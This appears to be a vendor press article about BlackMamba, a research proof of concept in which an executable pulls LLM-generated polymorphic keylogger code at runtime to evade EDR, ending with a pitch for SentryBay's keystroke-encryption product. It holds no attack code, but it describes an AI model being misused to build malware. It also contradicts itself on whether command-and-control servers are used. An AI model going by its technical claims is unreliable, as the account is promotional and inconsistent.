To showcase the capabilities of AI-based malware, researchers have devised a proof of concept (PoC) that exploits a sophisticated large language model. This PoC effectively synthesizes polymorphic keylogger functionality in real-time, seamlessly altering the benign code during runtime. Remarkably, this is achieved without the need for any command-and-control infrastructure to distribute or authenticate the malicious keylogger functionality. Recognizing the potential danger posed by this type of malware, the PoC has been named BlackMamba, drawing inspiration from the lethal snake. What sets this malicious software apart is its utilization of artificial intelligence, making it a formidable threat that can easily bypass most existing endpoint detection and response (EDR) security solutions.
In a significant development last year, OpenAI, the renowned AI research and development company, introduced ChatGPT, a neural network code synthesis tool that was made available to the public free of charge. Since its launch in November 2022, ChatGPT has garnered an astounding user base of over 1 million within a mere five days.
The tool is an incredibly versatile and powerful tool that serves a multitude of purposes. It can effortlessly handle simple inquiries, compose written content instantaneously, and even aid in the creation of original software programs, including malware. While traditional security solutions like EDRs rely on multi-layer data intelligence systems to combat sophisticated threats, the reality is that most automated controls struggle to effectively prevent unconventional or novel behavior patterns.
BlackMamba Can Be Classified As A Polymorphic Virus
eSecurity Planet reports that the BlackMamba PoC employs a clever technique by utilizing a benign executable that interacts with an API, namely OpenAI, during runtime. This enables the malware to retrieve synthesized malicious code, which is then used to capture the keystrokes of unsuspecting users. Notably, BlackMamba can be classified as a polymorphic virus, a type of malware that constantly mutates its appearance or signature files through new decryption routines. As a result, many conventional cybersecurity tools, such as antivirus or antimalware solutions that rely on signature-based detection, fail to identify, and block this insidious threat.
BlackMamba, at its core, is a keylogger that employs AI-powered techniques to effectively evade detection by EDR security solutions. What sets it apart is its unique ability to customize itself on the fly, without leaving any trace on the disk. This dynamic nature enables attackers to swiftly adapt their tactics, making it increasingly challenging to identify their malicious activities. Furthermore, BlackMamba distinguishes itself from other keyloggers by its capability to recognize the applications running on a system and adjust its behavior accordingly. For instance, when a user is utilizing office applications like Microsoft Word or Excel, BlackMamba intensifies its data capturing speed to swiftly gain access to sensitive documents or spreadsheets stored on the targeted computer.
Ensure Endpoint Protection Detects Threats Such As BlackMamba
“The rise of AI-powered malware like the BlackMamba PoC emphasizes the criticality of maintaining a vigilant stance against cyber threats for organizations. IT teams must ensure that their endpoint protection is regularly updated, comprehensive, and capable of detecting advanced threats such as BlackMamba type malware, to prevent significant harm,” said Tim Royston-Webb, CEO, SentryBay. “By comprehending the dangers posed by BlackMamba types of malware, organizations must take decisive action to safeguard their networks and data against advanced keylogging attacks powered by AI.”
According to DarkReading, the sophistication of the BlackMamba PoC surpasses that of typical malicious programs. It employs a range of obfuscation techniques, including code packing, to elude detection by antivirus software and other security measures. Additionally, it employs encrypted communication channels to exfiltrate stolen data and communicate with command & control servers, further complicating the detection and disruption of the attack.
Patented Protection Against Keylogging For Microsoft AVD And W365 Endpoints
SentryBay’s Armored Client is the OEM at the heart of Citrix App Protection, and is now proven protection against AI-powered malware for Microsoft AVD and W365 endpoints. The solution utilises endpoint access isolation in a manner which does not impact on performance and includes Keylogging protection.
“This valuable research illustrates that AI-driven polymorphic keylogging attacks can evade traditional EDR. Enterprises need to re-evaluate their security posture with the future of AI-driven threats,” said Brent Agar, VP Strategic Partnerships, SentryBay. “SentryBay’s patented keylogging protection doesn’t require malware identification and encrypts every keystroke at the lowest level. This technology is the core of all its products.”